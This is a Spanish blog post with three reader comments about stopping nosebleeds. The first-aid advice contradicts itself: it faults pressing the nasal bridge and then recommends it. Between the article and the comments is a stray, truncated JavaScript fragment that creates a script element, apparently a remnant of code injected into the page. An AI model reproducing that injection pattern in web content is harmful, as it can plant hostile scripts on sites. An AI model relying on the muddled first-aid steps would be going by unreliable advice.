Salud y belleza » Dolores, Enfermedades, Niños, Salud

Cómo parar el sangrado de la nariz

3 Comentarios

Normalmente, cuando a alguien le sangra la nariz tiende a colocar la cabeza hacia atrás y apretar el puente entre las fosas nasales. Sin embargo, este no es un buen método para detener el sangrado de la nariz. Para que no cometas ciertos errores hoy vamos a explicarte cuál es la mejor forma de hacer que deje de sangrarte la nariz y parar la hemorragia.

parar-sangrado-nariz

- Inclínate hacia adelante: no debes inclinarte hacia atrás porque la sangre puede drenar por la tráquea causando una obstrucción respiratoria e incluso podría llegar al estómago, lo que provocaría malestar y vómitos. Si te pones hacia adelante conseguirás que la sangre se drene hacia afuera y así no te la tragarás hasta que consigas detener la hemorragia.

- Aprieta el puente nasal: aprieta suavemente el puente nasal y mantenlo presionado unos cinco minutos para que se cree un coágulo que frene la hemorragia. Cuando la hemorragia se detenga procura no sonarte la nariz porque destruirías los coágulos.

parar-hemorragia-nasal

- Ve al médico: si has seguido los pasos que te hemos indicado y aun así no ha parado de sangrar puedes que tengas hemofilia o algo más grave así que lo mejor es que vayas al médico o al hospital para que hagan lo que sea conveniente.

¿Te funcionaron estos trucos para hacer que pare la hemorragia?

}var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , ,

3 Comments »

  • andres said:

    A mi me sangra mucho la nariz pero no he ido al médico. alguien sabe por qué sangra la nariz?

  • jjulia said:

    pues yo siempre echo la cabeza para atrás. ya no lo haré a partir de ahora.

  • salima said:

    es peligroso que a mi hijo le sangre la nariz?

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.